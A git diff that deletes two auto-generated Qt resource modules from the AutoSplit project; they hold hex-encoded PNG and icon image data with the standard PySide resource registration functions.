-\xf7\x13\x6b\x62\x8b\xdf\x5e\x26\x6a\xd7\x79\x50\x87\xdc\x63\x0d\ -\xf7\x00\x8f\x00\x26\x17\xfc\x6b\x23\x7f\x55\xaf\x93\xce\xc0\x11\ -\x00\x0f\xcb\x33\x85\xe4\x75\x4e\x81\x7f\x57\x28\x33\x53\x1c\xc5\ -\xc9\x5b\x8e\x7b\x8b\xd1\x71\xc7\x5e\x7b\x99\x66\xd0\xe4\x4b\x3a\ -\xe4\x90\xb5\x7c\xc8\x5a\x8e\x08\x91\x0b\xfe\xf5\x92\xbf\xa2\x3d\ -\x60\x55\x68\x30\x23\x24\xaf\x51\x2e\xdf\xe2\x95\xb9\xb5\x58\x8d\ -\x4b\x8b\x87\x61\x3a\x71\x1a\x58\x0b\x3a\x88\xe7\xf2\xf9\x75\xce\ -\x86\x6d\x3e\xa3\x23\xfe\x02\xcb\xc7\x80\xa7\x20\x77\xf5\x6f\x94\ -\x5c\x01\xf4\x90\x8e\x22\x90\xc0\x76\x04\x2f\x53\x8a\xff\xcb\x29\ -\xf2\xb5\xc5\x1a\x9b\xbc\x32\x38\x85\xdc\x2b\x58\x0f\x3a\x8a\xdd\ -\x7c\xbf\x41\x10\x34\xf9\x8a\x0e\xf8\x98\xd1\xfc\x15\xf0\x39\x60\ -\xc1\x5a\x78\xfc\x75\xb9\xe0\xf7\x82\xfc\x75\xec\x03\x7b\xfe\x6c\ -\x16\xe5\x82\x8e\xa8\x09\xc1\xf3\x84\xe2\xdf\x3a\x2e\xaf\x70\x4b\ -\xec\x2b\x54\x28\x77\xbd\x82\x5c\x19\x9c\xc7\x68\x88\xda\xe0\x37\ -\x31\x41\x93\xa7\x23\x9f\xcf\x98\x88\xbf\xb1\x96\x8f\x5b\xc3\x51\ -\x21\x88\x16\x16\x61\xe1\x87\x72\xc1\xef\x25\xf9\x2b\xd8\x67\xf6\ -\xfc\x79\xbc\x85\x28\x04\xdb\x11\xbc\x50\x2a\x5e\xe5\x14\x78\xae\ -\x5b\x64\x97\x57\xc6\x73\x8b\x71\xa9\xf1\x46\x54\x06\x26\x82\xd0\ -\x87\xb0\x85\x0e\x9a\xcc\x87\x3e\xf7\x9b\x88\x7f\xb0\x86\xbf\xb7\ -\x96\x07\xdd\x32\xf5\xe5\x13\x70\xf2\x47\x72\xa1\xef\x17\x1b\xf0\ -\xb5\x4b\x87\xdd\xef\x9e\xc5\x2d\x41\xe4\x53\x02\x76\x09\xc9\x0b\ 
-\xa4\xe2\xc5\x8e\xc7\x57\x3b\x05\x76\x79\x25\xaa\x4e\x11\x1c\xb7\ -\xd3\x89\x38\x84\x4f\xc6\x9a\xd8\xd2\x87\x6d\x08\xdb\x44\x41\x8b\ -\x53\x91\xcf\x97\x3b\x42\xff\x2f\xd6\xf2\x80\xd1\x2c\x08\x09\x47\ -\xbf\x23\x17\xfa\x24\x10\x36\x1e\x91\xb3\x72\xee\xa4\xd8\x88\xa6\ -\x28\x61\x76\xfe\xd1\x2c\xc5\x09\x08\x9b\x78\x42\xb0\x5d\x48\x9e\ -\x21\x25\xcf\x97\x0e\xcf\x56\x2e\xb7\xba\x05\x36\xbb\x25\x8a\x8e\ -\xd7\xf1\x0e\xd4\x60\x7a\x08\xd6\xc6\x56\x3e\x0a\x20\xf2\x31\x61\ -\x9b\x46\xe4\x73\x4c\x87\x7c\xd1\x68\x3e\x61\x0d\xf7\x5a\xcb\xc3\ -\x58\x96\x11\xd8\x3c\xae\x4f\x9e\xae\x02\xe8\xf6\xbb\x85\xb9\x02\ -\x48\x9e\x9d\xef\x98\x45\x87\x88\x42\x85\x2a\x82\x5d\x42\xf2\x0c\ -\xa9\xb8\x53\x2a\x6e\x57\x2e\x7b\x95\xcb\x66\xb7\x40\x55\x79\x28\ -\xc7\x8b\x3d\x84\xac\x29\x05\x6b\xe2\x2f\x1d\xc5\xa3\xb6\x22\x9f\ -\x28\x0a\xa8\xeb\x80\x13\x3a\xe4\x51\xa3\xb9\xd7\x18\xee\xb7\x86\ -\xc3\x58\x9e\x1e\xdf\x45\xfb\xe4\x03\x70\xf2\x07\x73\xa1\x4f\x92\ -\x4b\x0c\xbe\xb5\x17\x1e\x09\x93\x2b\x80\xf4\xb9\xe9\x5d\xb3\x04\ -\x4d\x44\xa1\x46\x55\x08\xa6\x84\x64\x46\x48\x0e\x4a\xc5\x33\xa4\ -\xc3\x8c\x74\xd8\xa5\x1c\xc6\x94\x4b\x4d\xb9\x78\xca\x41\x48\xa7\ -\xa3\x18\x64\xe7\x0b\x2e\x7f\xba\x27\x6b\xfc\x39\x5c\xfe\x24\x51\ -\xdb\x39\x14\xd4\xc4\x56\xbd\xeb\xca\x9b\x08\x4c\x84\xd5\x11\x2d\ -\x1d\xd0\xd0\x11\x67\x75\xc4\x13\x56\xf3\x15\xa3\x79\xd8\x1a\xbe\ -\x6c\x2d\x8f\x59\xc3\x19\x6b\x68\x02\x1c\x7b\x43\x2e\xf0\x69\xd2\ -\x91\x77\x8f\xf8\x91\x86\xb9\xb4\x0f\x00\x9b\x7f\x77\x96\xe9\xdb\ -\x60\xf9\x04\x2e\x82\xb2\x90\x4c\x0a\xc1\xb4\x10\xdc\x24\x24\x3b\ -\x84\x64\xaf\x54\x6c\x93\x8a\x2d\x52\x31\x26\x14\xa3\x52\x51\x90\ -\x0a\x4f\x48\x1c\x29\x51\x48\xa4\x10\x48\x21\x38\x7f\xa6\xdf\xaa\ -\xf3\x01\xbb\x42\x8e\xc5\x58\x83\xb5\xf1\xff\xb5\x35\x44\x46\x13\ -\x5a\x43\xdb\x68\xea\x46\xb3\x64\x35\xf3\xc6\x32\x67\x35\x27\xac\ -\xe1\x29\x63\x38\x6a\x2d\x27\x30\x3c\x6d\x2d\x0b\x61\x8b\xfa\xa9\ -\x07\x30\x13\xbb\xe1\xf4\x8f\xe5\x02\x9f\x25\x2e\x31\xf8\x69\x2f\ -\x28\xe7\xfa\x99\xfc\xad\x59\x96\x4e\xc3\xe6\xfd\x38\xd2\xa1\x28\ -\x04\x35\x21\x18\x45\x30\x21\x04\xe3\x42\x32\x06\x8c\x0a\xc9\x38\ -\x50\x15\x82\x32\x82\xa2\x88\x43\x3e\x85\x40\x60\xe3\x83\x80\x01\ -\x1f\x8b\x01\x9a\xd6\xd2\xc6\xb2\x64\xa1\x8e\xe1\x9c\xb5\x9c\x03\ -\xce\x59\xcb\x92\x35\x2c\x5a\xcb\xb2\x35\xf8\x3a\x20\xd8\xf7\x0a\ -\xcc\xa7\xff\x27\xb4\x7e\x39\x17\xf4\x41\xe4\xff\x00\x21\xbf\xbf\ -\x45\xaa\x78\x3d\x13\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\ -\x82\ -" - -qt_resource_name = b"\ -\x00\x09\ -\x0a\x6c\x78\x43\ -\x00\x72\ -\x00\x65\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x73\ -\x00\x10\ -\x0a\x2c\xb7\x07\ -\x00\x64\ -\x00\x6f\x00\x6e\x00\x61\x00\x74\x00\x65\x00\x62\x00\x75\x00\x74\x00\x74\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\ -\x00\x08\ -\x0a\x61\x42\x7f\ -\x00\x69\ -\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x69\x00\x63\x00\x6f\ -" - -qt_resource_struct = b"\ -\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\ -\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\ -\x00\x00\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\ -\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x3b\x83\ -" - -def qInitResources(): - QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) - -def qCleanupResources(): - QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) - -qInitResources() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py deleted file mode 100644 index 
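The deleted files above and below are machine-generated Qt resource modules: a .qrc manifest listing the packaged files is compiled by Qt's resource compiler (e.g. pyside6-rcc for the Qt 6 variant below) into a Python module, and the module-level qInitResources() call registers the embedded bytes with Qt at import time, after which the files are addressable through ":/" resource paths. A minimal usage sketch, assuming the PySide6 binding imported by the second deleted file and a module importable as resources_rc; the two ":/resources/..." paths follow from the "resources" prefix and the two file names encoded in qt_resource_name above:

    import sys

    from PySide6 import QtGui, QtWidgets

    import resources_rc  # noqa: F401 -- importing alone runs qInitResources()

    # QPixmap requires a running Q(Gui)Application before it can load data.
    app = QtWidgets.QApplication(sys.argv)

    # Files registered under the "resources" prefix are addressed via ":/".
    icon = QtGui.QIcon(":/resources/icon.ico")
    donate_button = QtGui.QPixmap(":/resources/donatebutton.png")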
diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py
deleted file mode 100644
index 0131ce6..0000000
--- a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py
+++ /dev/null
@@ -1,3089 +0,0 @@
-# Resource object code (Python 3)
-# Created by: object code
-# Created by: The Resource Compiler for Qt version 6.1.2
-# WARNING! All changes made in this file will be lost!
-
-from PySide6 import QtCore
-
-qt_resource_data = b"\
[... hex dump of qt_resource_data elided: hex-escaped bytes of an embedded 170x81 PNG (sRGB/gAMA/pHYs chunks, "Paint.NET v3.5.11" software tag), recompiled for Qt 6 / PySide6 ...]
-\xed\x67\x7c\x33\x03\x2a\x0e\x4e\x86\xff\x4a\xac\x5a\x3c\x47\xe6\ -\x09\x61\xec\x5f\x37\x4f\x8a\xc2\x6b\xfe\x0f\xa8\xd8\x58\xec\x7d\ -\x47\xe0\xc8\xd6\x79\x48\xbc\xb9\x0c\x17\xfe\x58\x84\x8a\x14\xa9\ -\xf0\xd2\x8e\xa3\xa7\xc8\x7b\x65\x71\x32\x47\x5d\x5e\x86\x74\x0e\ -\x5c\x12\x0f\x47\x4f\xcf\x2f\xc3\xa1\x4d\xf3\xe8\x5d\x47\xd3\x76\ -\x24\x9c\x5d\xa7\x70\x82\xac\x40\x1a\xb7\x0e\xc2\x7b\x0a\x01\x37\ -\x78\xdf\x99\x9e\x7d\x05\x97\x75\xe6\xdf\xf2\x85\xfb\x84\x69\x52\ -\xfc\xcd\x3b\x8e\xe6\x61\x6b\x29\x07\x79\x25\x92\xaf\x2f\x43\xb7\ -\x01\x13\xf9\x6c\xc3\xf1\xc9\x80\x71\xc8\x92\x02\x15\xfb\xbd\xfc\ -\xef\xf5\xef\x20\xb6\x1d\x62\xeb\x26\x9c\x92\x10\x98\x46\x88\x4e\ -\x37\x4e\x79\xd1\xd9\xe8\x11\xc2\x26\xfa\x38\x93\x4b\xbd\x58\xc9\ -\xd4\x37\x3d\x91\x79\x76\x32\x54\x7b\xbb\x22\xcd\xd7\x0e\x29\xcb\ -\x4c\x91\x46\x61\xa6\x52\xa4\xa9\xde\xda\x74\x1a\x45\x2b\x62\x21\ -\x54\x8d\xfc\x7d\x6b\x9d\x97\x08\xd5\xa3\xe6\x4d\xf1\xb5\x69\xc6\ -\x72\xba\x62\xaa\x5b\x25\xe2\xe5\x26\xbc\x36\xa3\x8b\xd6\xba\x67\ -\x41\x3a\xdd\x75\xe6\x9a\x4a\xc8\xfc\xb5\x11\xb2\xf6\x75\x47\xe6\ -\x89\x91\x50\x9f\x9f\x04\xf5\xe5\x1f\x90\x75\x65\x16\xd4\x57\xbe\ -\x63\xfc\xbd\x4c\xbf\x0c\x35\x6d\xd4\x22\x7d\xf9\x3b\x59\x47\xa4\ -\xff\x16\x3c\xfc\x1d\xdf\x30\x83\x03\x49\x0f\x47\xe1\x2c\x9c\x3e\ -\x1e\x59\xe2\x40\x28\xfa\x72\xf5\x3b\x3c\x3f\x39\x1b\x35\x5b\x6b\ -\x3d\x60\xb3\xf7\x87\x22\xf9\xdc\x2c\x8c\x75\x9d\x40\xe1\x8d\xe4\ -\x52\x3f\x12\xb7\x76\x7e\xa3\x6b\xeb\x3b\xec\xf5\x9d\x22\x85\x52\ -\x81\x1e\x70\x9b\xa7\x3b\xdb\xfe\x1e\xc3\x47\xba\x49\x91\x37\xe9\ -\x30\x0a\xaa\x8b\x33\x99\xf7\x1d\x2e\xfe\x36\x5d\x0a\xad\x82\xc3\ -\x70\xac\x9a\xeb\x26\xeb\xc7\x5f\x98\x83\x43\x1b\xe7\xc2\x85\xc2\ -\xed\xda\x6f\x02\xde\xeb\xe1\x0a\x7b\x7a\xdf\xca\xcd\xe8\x39\x59\ -\xdf\x67\xf6\x44\xd9\xd7\xd4\x0b\xb3\xd0\xb4\x93\x8b\xbc\xff\xf0\ -\xa1\x2e\xba\x7b\xcf\x40\xc2\xb9\x1f\x50\xa7\xbd\xf6\x30\x28\xb6\ -\x15\xdd\x06\x8e\x47\xf7\x81\x6e\xe8\xd6\x7f\x22\x3d\xb0\xf0\xca\ -\x23\x31\xe0\x33\x17\x68\xe4\x7b\x9b\xc5\xe7\xd3\xbf\xbf\xbc\x64\ -\xbd\x2e\x97\xd9\x0f\xb6\x2d\x62\x41\x66\x01\xe8\xcb\x73\xf8\x4e\ -\x5b\x76\x69\x26\xb2\xce\xb8\x21\xf3\xf0\x17\x50\xfd\xf1\x21\xd2\ -\x37\xd4\xa4\x40\x6d\x91\xb6\x4c\x08\x93\xfa\x91\xa2\x34\x65\xda\ -\x44\x92\xce\x74\x8a\x4c\x9b\x42\xed\x55\x09\xf0\xa8\x09\x2c\xa9\ -\xfe\x32\x8f\xca\xa5\xdf\xb3\xa6\xac\xa8\xf2\x12\x0d\x10\x11\xbf\ -\x04\xed\x4c\x60\xda\x08\xfa\xb2\xff\x1a\xf2\xfe\xda\xd9\x98\x2e\ -\xe3\xe2\xf8\x69\x48\x4b\x39\xc0\x55\x9a\x0d\xc3\xe1\x6f\xde\x41\ -\x2a\x27\x9c\xe8\x4b\xb2\xb7\x19\x16\x8d\x6c\x81\x4a\x4d\xc5\x32\ -\x3b\x02\xd3\xbe\x6e\x8b\x67\x8b\x6c\xd0\xf9\xa3\x3e\x14\xcf\x48\ -\xf4\xf8\xa4\x27\x9e\x2e\xb4\xe2\xcb\x14\x6d\x9a\xc2\xdb\xa9\x89\ -\x5c\x76\xab\x52\x5c\x27\x67\x54\x96\x6d\xd7\x6b\x3d\x98\x42\x1d\ -\x85\x11\x7d\x3b\x49\x6f\xa0\xa2\xdd\x52\xc7\x26\xd2\xc3\xd6\x69\ -\xfd\x15\x4e\xcf\x78\x0b\x71\x4b\x4b\x60\xd2\x17\xef\xa1\x2a\x85\ -\xfb\x56\xf3\xe1\x18\xd8\xbd\x1b\x66\x0e\x6e\x87\xcf\x7b\x7e\x22\ -\xfb\x55\xc9\x61\x18\xae\xcc\xaa\x28\xdb\xf3\xff\xa9\xac\xac\x2b\ -\xf2\x97\x3a\xdb\xb3\x9f\xc2\xbb\x98\xe0\xee\x8f\xe5\xe4\x64\x12\ -\x65\x1f\x74\xec\xcf\xba\x1f\xe3\xb3\x1e\x5d\x25\x32\x4d\xd6\x8e\ -\x6d\x28\xdb\x10\xcb\x67\x9a\x97\x69\xf6\x3b\xff\x27\xc8\xf3\x8e\ -\xff\x26\xc6\xda\x37\x86\x78\x16\x31\x86\x2a\x6f\x4b\x7a\x53\x1e\ -\xa8\x3c\xeb\xbe\x44\xa8\x2b\x9a\x71\x8f\x5a\x5b\xaa\x3e\xb7\x08\ -\x5e\x17\xd1\xce\x7f\x13\xad\xa8\xc4\x83\x8a\xeb\x62\x88\x5d\x6a\ -\x86\x9e\x9f\xf4\xe0\x00\x8f\x42\xdb\xf7\x07\x22\x70\x4e\x29\x0a\ -\xb5\x38\x62\x16\x5b\x61\xf5\x98\x86\xa8\xd1\x72\xb0\x14\x45\x27\ 
-\x8a\xf3\xc1\x02\x2b\x3c\x59\x68\x83\x0f\x3b\xf6\x93\x82\xe8\xc5\ -\x7a\x4f\x16\x59\xf2\xb9\xcd\x11\x31\xdf\x06\x1d\x69\x23\xf2\x3f\ -\xe9\xd2\x07\x11\x0b\x6c\xf0\xe7\xac\x0a\x52\xe4\x95\x98\xe7\x45\ -\x11\xa7\x88\x76\x3d\xcc\x31\xa4\x6f\x17\xda\x39\xe2\xbd\x0f\x06\ -\xe0\xe9\x22\x2b\x1c\x98\xf2\x0e\x6a\xb6\x18\x22\xbd\xb1\x87\xa3\ -\x03\x92\x3c\xe9\x2d\xbc\xcc\xf0\x75\xaf\xce\xf2\xde\xf5\x5a\x0f\ -\x92\x4b\x9f\xe8\xbf\x8f\x4b\x23\x69\x57\xa7\xd5\x60\x9c\xfa\xf6\ -\xad\xec\xe7\xba\xf5\x53\x19\x94\xe5\x24\x29\x47\xcf\x39\x6b\x48\ -\x2b\xa4\x78\x9a\x71\x62\x98\x48\xaf\x93\xe4\x69\x8e\x3b\xb3\x4b\ -\x23\x7a\x49\x09\x3e\x1b\xdb\x96\x5e\x4a\xdb\xde\xff\x5f\x38\x8e\ -\x7c\x8e\x14\xb1\x5f\xf5\xb2\x84\x7a\x45\x23\x9e\x8d\xda\x15\x2c\ -\x54\x6c\xe9\x29\x85\x9a\xe6\x6d\x2e\x5f\x4a\x8a\x78\x01\xf2\x05\ -\xb1\x91\x5c\xe8\x6f\x90\x27\x9f\x37\xc9\x07\xeb\xff\x77\x11\x62\ -\x35\xa3\xb7\x2c\x2e\x3d\xe6\xad\xd9\xe5\xd0\xea\xbd\x81\x72\x79\ -\xad\xd7\xfa\x6b\x0c\xee\xd3\x05\x43\xfb\x7d\x84\x0f\x3f\xec\x87\ -\x6a\xcd\x85\x78\x46\xe2\x23\x0a\xf0\xdc\xcc\x2a\xb2\xff\x89\x14\ -\xd1\x20\xda\x88\xfc\x9a\x2d\x06\xc3\xd3\xb9\x89\xf4\x9e\x83\x7a\ -\x77\x91\xcb\x74\xb5\xe6\xc3\xb0\xc3\xbd\x16\x92\xf8\x2c\xcb\x9c\ -\x1b\xa3\x22\xb7\x13\xb5\x29\xaa\x63\xd3\xaa\x22\x99\x5e\xec\xfe\ -\xdc\x92\x78\xbf\x63\x5f\xb9\x3f\xfd\xba\x77\x67\xbe\xb7\xe2\x58\ -\x33\xae\xbe\xfc\xf8\xab\x2c\x3d\xea\xd4\x2f\xda\xe1\xcc\x8c\x2a\ -\x58\x3c\xaa\x29\xaa\xb5\x18\x4a\xa1\x8e\xc2\x20\x0a\x36\x99\x7d\ -\x17\xf7\x1f\xf7\xd9\xfb\x72\x32\xbc\xdd\x7c\x28\x45\xdd\x04\x87\ -\xbe\xa9\x8e\x6b\x3f\x94\x47\xb4\x87\x05\xda\x75\x18\xc0\xfd\xf0\ -\x08\xd4\xe2\xe4\x9a\x31\xa8\x0d\x36\xbb\xd5\xc1\xea\xd1\x8d\x30\ -\xac\xef\x47\xf8\xa2\x67\x57\x7a\x7f\x4b\xd9\x8e\x1c\x27\x8e\x51\ -\x32\xfb\xf8\x4f\x61\xfc\x5d\xbf\x1e\xc6\xda\x37\x44\x68\x25\x99\ -\xcf\x21\xde\x49\x1a\x85\xaa\xd9\xd8\x11\xca\xef\x5f\xbd\x44\xa8\ -\xdb\xfb\xba\x0b\xa1\xa6\x7b\xd9\xca\x06\x92\xe4\x4b\xc8\xdf\xb0\ -\x21\x49\x42\x28\x46\xf2\xff\xdb\x88\x41\x12\x0f\x98\x24\x3c\x8b\ -\xa7\x09\xf6\x4f\xad\xce\xe5\x96\x82\xa0\x37\x12\x87\x16\x21\x40\ -\x21\x04\x71\xaa\x16\x03\x3e\x6e\x60\x07\xdc\xfe\xb9\x8c\x7c\xae\ -\x44\xce\xe0\x64\x22\x84\xd9\xb8\xed\x17\xdc\x63\x6a\xbf\x1c\x10\ -\x22\x17\xfb\xdb\xfa\xf4\x7c\xcb\x46\xdb\xcb\xfb\xc4\xd0\x8b\x39\ -\xf7\xef\x28\x05\xd9\xfa\xbd\xcf\x70\x7f\x81\x35\xeb\x9a\xe0\xf2\ -\xac\xf2\x78\x9b\x5b\x8c\xf2\x0e\x4e\x14\x5a\x63\xd9\x9f\xd3\x33\ -\x2b\xa3\x01\xb7\x01\xa2\x0f\xe5\x78\xdf\x2a\x4d\x87\xe1\x83\x4e\ -\x7d\x29\x3a\xd1\x27\xe1\x8d\xed\x69\x27\x26\x97\x29\x7e\x19\xd1\ -\x54\x8a\x5a\x6c\x27\x84\x57\x16\xcb\xbd\x1f\x85\x9d\xc8\x49\xf0\ -\xc7\xe4\x5a\x68\xd0\xe6\x4b\x59\x26\xfb\x24\x9e\x85\xf7\x2f\xef\ -\x30\x14\xce\x9f\x7e\xc0\xfb\x17\x63\x3b\x62\x90\x29\x86\x37\xf4\ -\xfe\xff\x51\xa4\xa8\x79\x1e\xf2\x2a\x29\xfe\x2d\xde\x16\xe5\xc4\ -\xb4\x62\x3a\x59\xe6\x0f\x8a\x4f\xa3\xd6\xf0\xae\x87\x4c\xcf\x0a\ -\xac\x64\xca\x01\x2d\xf6\x4a\x11\x8a\xf2\x37\x87\xe8\x23\x85\x2a\ -\xfa\xc2\xeb\x3b\x73\xca\x60\xef\x94\xb7\xb1\x67\x4a\x75\xc6\xd5\ -\xb1\x6f\x6a\x35\x99\xbe\x41\x4f\x1b\xcd\x6d\x41\x22\x6d\x84\xf7\ -\x49\x92\xcf\xc6\xfa\xb2\xff\xa6\x78\xc8\xbd\xe9\x0a\x7a\xab\xc9\ -\x5f\xb5\xc3\x84\xcf\xdf\xc7\x3a\x7a\x45\x91\x27\x26\x41\x22\x6d\ -\x62\x97\x9a\x73\xff\x59\x09\x7b\xd9\xde\x89\x99\x95\xa4\xa7\x48\ -\x62\x3b\x61\xf3\x6d\xe5\x7d\x44\xbe\xb0\x4f\xf5\x2a\xc1\x09\x60\ -\x82\xf3\xdc\x26\x4c\xff\xba\x1d\x66\x0e\x6a\x2b\xbd\x6f\xc8\x3c\ -\xda\xd1\xe6\x00\xf7\xcc\x0f\x16\x5a\xb3\x1f\xda\xf7\x1a\xc3\xfd\ -\xec\x9a\xb1\xf5\x31\xf9\x8b\xf6\x98\xf8\xf9\x7b\x58\xc6\xad\xc0\ 
-\x53\x6e\x3f\x64\xdf\x38\x89\x1e\x72\x6b\xb2\x4e\x94\x7f\xd5\x16\ -\x13\xb8\xef\x9d\x3b\xac\xb9\x9c\x8c\x62\x8b\x93\xc8\x95\x44\x3c\ -\x87\x18\xe0\x44\xf1\x0e\x44\x9d\xff\xe7\x24\x73\x8b\xa4\xf2\x2e\ -\x0f\x65\x59\xa3\x97\x7f\x33\x95\x75\x64\x7c\x43\xcd\xda\x77\x23\ -\xd5\x9e\xef\xb0\xa2\xb9\x56\x88\xe2\x65\x08\x21\xe8\x30\x76\x03\ -\x89\xde\x46\xcc\x0c\x29\xa0\x42\x42\x6f\x98\x07\x63\x36\xff\x76\ -\xfe\x3f\xf7\xbd\x00\xb2\xc7\xf0\x7f\xf6\x5c\xd4\xd0\xb2\x12\x50\ -\xad\xa8\x96\x82\xfd\xa3\xfb\xe9\x24\x59\x70\x80\x4f\x13\x5f\xf1\ -\xef\xb1\x53\xbd\x4b\x72\x79\x31\x47\xd2\x72\xc2\x06\x04\x89\xcb\ -\xb5\x24\x09\x74\x79\x22\x9d\xbc\xdc\x02\x49\x3e\xf4\x04\x79\xb0\ -\x22\xd6\xf9\x59\x61\x88\x6d\x0e\xbe\x36\xb9\xf2\xff\x29\x44\xdb\ -\x76\x06\xe4\xba\xa7\x1e\x5f\x23\x18\xd4\x4b\x2e\x08\x5f\x01\xb7\ -\x4b\xba\x67\x4c\x34\xfa\x9c\xaf\x4b\xfe\x7e\xe4\xeb\xbb\xc0\xb0\ -\xef\x86\x88\x7e\x16\x92\xa4\x15\x39\xe3\x90\x98\xa7\x2f\xaf\x42\ -\x7b\x9f\x3c\x18\xed\x8b\x9e\xdc\x76\x76\x48\xf5\x29\x05\xb5\x4f\ -\xcd\xab\x3a\x29\xbe\x3c\x28\x5e\x8d\x4c\x15\xcf\xfa\x50\x7b\x57\ -\x43\xf2\x4a\x2e\x73\xab\xab\x20\x79\x75\x65\x52\x09\x49\x6b\x2a\ -\xe7\x65\x6d\x15\xc6\x2c\x5f\xfb\x96\x01\x6f\xeb\xe0\xa1\x63\x5d\ -\x55\xa4\x90\xe4\xf5\xbc\x5e\xff\x8e\x11\x78\x9f\xf5\x35\x74\x54\ -\xa3\x2d\xf3\x0a\x8b\xd1\xb6\x8c\x91\xd7\x2e\x85\x79\x29\xeb\xab\ -\x1b\x50\xe3\x95\x88\x3e\x26\x6d\xc8\x4b\xb2\x88\x65\x59\x75\x5d\ -\xbf\xf8\x9c\x12\x91\x7e\x05\x86\xfd\x62\x9e\x31\xf2\xd9\xc9\xfe\ -\x1b\x62\xbc\xcf\xb9\x31\xd6\x7f\xe3\xf0\x9d\x89\xfb\xea\x9e\x43\ -\xf6\xc1\x18\x06\xfd\x32\xc6\x2b\xdf\xed\x3a\x6d\x79\xea\xfa\x9a\ -\xc8\xf4\xa9\x49\xdd\xd5\x69\xad\x93\xe2\xcb\x03\x96\x37\x2d\xa6\ -\xf8\xd8\xcf\x16\x3f\x62\x55\xad\xaa\x87\xe4\x2d\x3c\x50\x90\x94\ -\x2d\x8d\x19\x93\xad\x0e\xd9\xa4\xfc\x4a\x44\xbc\xb5\x29\x92\x7f\ -\x6d\xca\x6b\x41\x33\xd2\x9c\xd7\xe4\x37\x41\x0b\x49\x8a\x60\x5b\ -\x4b\x1d\xad\x73\xd8\x2e\x68\x83\xd4\xed\x6d\x91\x2a\xf3\x5a\xd1\ -\x96\x36\x86\x64\xd7\xcd\x4d\xae\x76\xf4\x75\x0d\xd1\xb5\xff\xf7\ -\x68\x4b\xda\x19\x67\x47\x3b\x24\xcb\xb8\x2d\x9f\x53\xdc\x53\xd7\ -\xb7\x02\xfb\xac\x47\xd8\x1a\xf6\xdf\x08\x7f\xbb\xff\xa2\xef\xb9\ -\x31\xe8\xbf\x31\x76\xb0\x9e\x78\x96\xec\x77\xaf\x7f\x2e\x11\xeb\ -\x31\xe8\xe7\x6b\xf5\x95\x63\xbe\xbd\x3d\x52\x7f\x6b\x8b\xac\x95\ -\x0d\xa0\x2c\xaf\xff\x7b\xd6\xf2\x7a\x96\x3a\x29\xbe\x3a\xa8\x37\ -\x75\xaf\x03\xcf\xba\xc1\x1a\xaf\x9a\x6c\xe8\x3d\xa4\xec\xea\x8c\ -\xd4\x5d\x1f\x23\x79\x77\x17\xa4\xee\xfe\x04\x29\xbb\x79\xbd\xe7\ -\x63\xc6\x4c\xef\x11\x74\x43\xca\xde\xae\x44\xc4\xdd\x49\x0f\x49\ -\x9a\x8e\xd4\x7d\x3d\x49\x2f\xa4\xed\xeb\x8d\xb4\xfd\xbd\x91\x2a\ -\xe9\x23\x49\xdb\xdf\x17\x69\x07\xb4\x88\xeb\x14\xda\x09\x84\x7d\ -\x3e\xb2\xeb\xbe\x0c\x6d\xbb\x2f\x47\xdc\x2b\x17\xba\xfb\xbf\x9c\ -\x7e\x05\xd0\x9f\x6d\xf4\xe7\x73\xf4\x43\xea\x5e\x23\x7d\x96\xfd\ -\x36\x7c\xf6\xc2\x60\xac\xdf\x05\x93\xaf\xaf\xa2\x3f\x79\xf2\x0a\ -\x42\xf7\x1c\xf2\x19\xb4\xa4\x30\x3f\x95\xfd\xd5\x62\x30\x1e\x46\ -\xfb\xaa\xc7\x48\xbf\xd8\x0f\x39\xc6\x22\xad\xbb\x67\x3a\xdf\x59\ -\xee\xb4\xea\xd7\x0e\xd0\x78\xd5\x4d\xc7\x86\x2e\xed\x74\x12\x2c\ -\x7c\xd0\xac\x6e\xdb\x56\xf1\x6e\x0c\xb5\xaf\x3d\x32\xf6\x7d\x81\ -\x34\xbf\x61\xc8\x38\x36\x82\xf1\x08\xa4\x93\x34\x3f\x47\xc6\xa3\ -\xa0\xf2\x73\x82\xea\xb8\x23\xd2\x4e\x38\x21\xf5\xa4\x13\xd2\x4e\ -\x3a\x13\x17\x1d\xa3\x73\x38\xe5\xaa\xe5\x74\x2e\x4e\x8d\x63\x3c\ -\x5e\x92\x2e\x63\x5e\x9f\x1a\x23\x49\x7f\x29\xae\xb4\x1f\x9b\xd3\ -\x4e\x1e\x44\x7e\x2e\x4e\x8d\xa5\xfd\x38\x9d\x3d\xd3\xbc\x47\xf6\ -\xbd\xf2\x20\xfa\xe0\x96\x87\x34\x43\xce\xe4\xe2\xec\x04\x32\x91\ 
